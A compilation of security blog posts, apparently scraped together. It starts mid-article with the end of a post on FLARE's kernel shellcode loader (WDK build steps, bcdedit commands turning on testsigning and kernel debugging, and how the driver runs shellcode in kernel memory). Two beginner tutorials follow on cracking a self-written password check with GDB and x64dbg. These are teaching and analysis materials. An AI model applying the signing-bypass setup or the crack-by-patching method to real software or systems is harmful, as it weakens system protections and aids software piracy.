The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcomed to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.


Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.

Wrap-Up

We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

Reverse Engineering x64 for Beginners – Linux

As to get started, we will be writing a simple C++ program which will prompt for a password. It will check if the password matches, if it does, it will prompt its correct, else will prompt its incorrect. The main reason I took up this example is because this will give you an idea of how the jump, if else and other similar conditions work in assembly language. Another reason for this is that most programs which have hardcoded keys in them can be cracked in a similar manner except with a bit of more mathematics, and this is how most piracy distributors crack the legit softwares and spread the keys.

Let’s first understand the C++ program that we have written. All of the code will be hosted in my Github profile :-

https://github.com/paranoidninja/ScriptDotSh-Reverse-Engineering

The code is pretty simple here. Our program takes one argument as an input which is basically the password. If I don’t enter any password, it will print the help command. If I specify a password, it gets stored as a char with 10 bytes and will send the password to the check_pass() function. Our hardcoded password is PASSWORD1 in the check_pass() function. Out here, our password get’s compared with the actual password variable mypass with the strcmp() function. If the password matches, it returns Zero, else it will return One. Back to our main function, if we receive One, it prints incorrect password, else it prints correct password.

Now, let’s get this code in our GDB debugger. We will execute the binary with GDB and we will first setup a breakpoint on main before we send the argument. Secondly, we will enable time travelling on our GDB, so that if we somehow go one step ahead by mistake, we can reverse that and come one step back again. This can be done with the following command: target record-full and reverse-stepi/nexti

Dont’ be scared if you don’t understand any of this. Just focus on the gdb$ part and as you can see above, I have given an incorrect password as pass123 after giving the breakpoint with break main. My compiled code should print an incorrect password as seen previously, but as we proceed, we will find two ways to bypass the code; one is by getting out the actual password from memory and second is by modifying the jump value and printing that the password is correct.

Disassembly

The next step is to disassemble the entire code and try to understand what actually is happening:

Our main point of intereset in the whole disassembled code would be the below few things:

1. je – je means jump to an address if its equal to something. If unequal, continue with the flow.

2. call – calls a new function. Remember that after this is loaded, the disassembled code will change from the main disassembly function to the new function’s disassembly code.

3. test – check if two values are equal

4. cmp – compare two values with each other

4. jne – jne means jump to and address if its not equal to something. Else, continue with the flow.

Some people might question why do we have test if we have cmp which does the same thing. The answer can be found here which is explained beautifully:-

https://stackoverflow.com/questions/39556649/linux-assembly-whats-difference-between-test-eax-eax-and-cmp-eax-0

So, if we see the disassembly code above, we know that if we run the binary without a password or argument, it will print help, else will proceed to check the password. So this cmp should be the part where it checks whether we have an arguement. If an arguement doesn’t exist it will continue with the printing of help, else it will jump to <main+70>. If you see that numbers next to the addresses on the left hand side, we can see that at <+70>, we are moving something into the rax register. So, what we will do is we will setup a breakpoint at je, by specifying its address 0x0000000000400972 and then will see if it jumps to <+70> by asking it to continue with c. GDB command c will continue running the binary till it hits another breakpoint.

And now if you do a stepi which is step iteration, it will step one iteration of execution and it should take you to <+70> where it moves a Quad Word into the rax register.

So, since our logic is correct till now, let’s move on to the next interesting thing that we see, which is the call part. And if you see next to it, it says something like <_Z10check_passPc> which is nothing but our check_pass() function. Let’s jump to that using stepi and see what’s inside that function.

Once, you jump into the check_pass() function and disassemble it, you will see a new set of disassembled code which is the code of just the check_pass() function itself. And here, there are four interesting lines of assembly code here:

The first part is where the value of rdx register is moved to rsi and rax is moved to rdi. The next part is strcmp() function is called which is a string compare function of C++. Next, we have the test which compares the two values, and if the values are equal, we jump (je) to <_Z10check_passPc+77> which will move the value Zero in the eax register. If the values are not equal, the function will continue to proceed at <+70> and move the value One in the eax register. Now, these are nothing but just the return values that we specified in the check_pass() function previously. Since we have entered an invalid password, the return value which will be sent would be One. But if we can modify the return value to Zero, it would print out as “Correct Password”.

Also, we can go ahead and check what is being moved into the rsi and the rdi register. So, let’s put a breakpoint there and jump straight right to it.

As you can see from the above image, I used x/s $rdx and x/s $rax commands to get the values from the register. x/s means examine the register and display it as a string. If you want to get it in bytes you can specify x/b or if you want characters, you can specify x/c and so on. There are multiple variations however. Now our first part of getting the password is over here. However, let’s continue and see how we can modify the return value at <_Z10check_passPc+70> to Zero. So, we will shoot stepi and jump to that iteration.

Epilogue

As you can see above, the function moved 0x1 to eax in the binary, but before it can do a je, we modified the value to 0x0 in eax using set $eax = 0x0 and then continued the function with c as below, and Voila!!! We have a value returned as Correct Password!

Learning assembly isn’t really something as a rocket science. But given a proper amount of time, it does become understandable and easy with experience.

This was just a simple example to get you started in assembly and reverse engineering. Now as we go deeper, we will see socket functions, runtime encryption, encoded hidden domain names and so on. This whole process can be done using x64dbg in Windows as well which I will show in my next blogpost.

Reverse Engineering x64 for Beginners – Windows

In this post, I will be using x64dbg since I wasn’t able to find a version of x64 Immunity debugger or Olly Debugger to reverse engineer the binary. However, below are alternatives along with the download links which you can choose. If you are able to find other x64 debuggers for windows, do add them in the comment and I will mention them here.:

  1. Immunity Debugger
  2. Olly Debugger
  3. IDA Pro
  4. WinDBG
  5. X64dbg

Immunity Debugger is an awesome tool if you are debugging x86 binaries. However, since we are only focusing on x64, we will have to use x64dbg which supports both x86 and x64 disassembly.

Once you have downloaded the required debugger, you can compile the source code which is uploaded on my Git repo here. You can compile the binary in Windows with the below command:

$ g++ crack_me.cpp -o crack_mex64.exe -static -m64

Make sure you use a 64-bit version of g++ compiler else it will compile but won’t work. You can also download the binary from my repo mentioned above. I prefer to use the Mingw-x64 compiler, but some also use clang x64. It all boils down to the preference of which one you are familiar with.

Disassembly

Once you have compiled the binary, let’s load it up in x64dbg. Remember, that our binary accepts an argument which is our password. So, unlike GDB where we can supply the argument inside the GDB; in Windows, we will have to supply it during the loading of binary via the command line itself.

To load the binary into x64dbg, below is the commandline you can use:

.\x64dbg.exe crack_mex64.exe pass123

Once, the binary is loaded, you will see six windows by default. Let me quickly explain what these windows are:

The top left window displays the disassembled code. This is the same as disassemble main in GDB. It will walk you through the entire assembly code of the binary. The top right window contains the values of the registers. Since we are debugging a x64 binary, the values of x86 registers for example EAX or ECX will be inside of RAX or RCX itself.

The middle two windows, left one shows you the .text section of the assembly code, and right one shows the fastcalls in x64 assembly. Fastcalls are x64 calling conventions which is done between just 4 registers. I would recommend skipping this if you are A beginner. However for the curious cats, more information can be found here.

The bottom left window displays the memory dump of the binary, and the bottom right shows the stack. Whenever variables are passed on to another function, you will see them here.

Once, the above screen is loaded, we will first search for strings in our binary. We know a few strings when we executed the binary i.e. ‘Incorrect password’, or ‘Correct password’ or ‘help’. As for now, our primary aim is to find the actual password and secondary aim is to modify the RAX register to Zero, to display ‘Correct Password’ since our check_pass() function returns 0 or 1 depending upon whether the password is right or wrong.

To search for strings, right click anywhere in the disassembled code -> Search for -> All Modules ->String References

This will bring you to the below screen where it shows you the string Incorrect Password. Since we know there will be a comparison between our input password and the original password before printing whether the password is correct or not, we need to find the same from the disassembled code to view the registers and the stack to search for the cleartext password. Now right click on the ‘Incorrect Password’ area and select Follow in Disassembler. This will display the below screen in the disassembly area:

What I have done over here in the above image, is I’ve added a breakpoint at 00000000004015F6. The main reason for that is because I can see a jmp statement and a call statement right above it. This means that a function was called before reaching this point and the last function to be executed before the printing of ‘Correct/Incorrect password’ is the check_pass() function. So, this is the point where our interesting function starts. Lets just hit on the run button till it reaches this breakpoint execution.

Once, you’ve reached this breakpoint, hit stepi (F7) till you reach the mov RCX, RAX or 0000000000401601 address. Once it is there, you can see our password pass123 loaded on to the RCXregister from RAX register. This is nothing but our argument loaded into the function check_pass(). Now, keep stepping into the next registers till you reach the address 0000000000401584, which is where our plaintext password gets loaded into the RAX register.

You can see on the top right window that our password ‘pass123’ and original password ‘PASSWORD1’ is loaded onto the registers RCX and RAX for comparison. The completes our primary motive of getting the plaintext password. Now since our passwords are different, it will be printing out ‘Incorrect password’. We now need to modify the return value of 1 to 0 which is returned by the check_pass() function. If you see the above image, 3 lines below our code where the password is loaded onto the register, you will test EAX, EAX at address 0000000000401590. And we see two jump statements after them. So, if the test value returns they are equal, it will jump (je = jump if equal) to crack_m3x64.40159B which is where it will mov 0 to the EAX register. But since the password we entered is wrong, it will not jump there and continue to the next code segment where it will move 1 to EAX i.e. at address 0000000000401594. So, we just setup a breakpoint on this address by right clicking and selecting breakpoint -> toggle since we need to modify the register value at that point and continue running the binary till it hits that breakpoint:

Once, this breakpoint is hit, you will the value 1 loaded into the RAX register on the right-hand side. The EAX is a 32 bit register which is the last 32 bits of the RAX register. In short,

RAX = 32 bits + EAX

EAX = 16 bits + AX

AX = AH(8 bits) + AL(8 bits)

and so on.

Therefore, when 1 is loaded into EAX, it by default goes into RAX register. Finally, we can just select the RAX register on the right-hand side, right click and decrement it to Zero.

Epilogue

And then you should see that RAX is changed to Zero. Now continue running the binary till it reaches the point where it checks the return value of the binary as to whether its Zero or One, which is at address 000000000040160C. You can see in the below image that it uses cmp to check if the value matches to 1.

It uses the jne (jump if not equal) condition, which means it will jump to crack_mex64.401636 if its is not equal to One. And crack_mex64.401636 is nothing but our printing of ’Correct Password’ at address 0000000000401636. You can also see in the register that our password is still pass123 and inspite of that it has printed it’s the correct password.

This would be it for the cracking session of windows for this blog. In the next blog, we will be looking at a bit more complex examples rather than finding just plaintext passwords from binaries.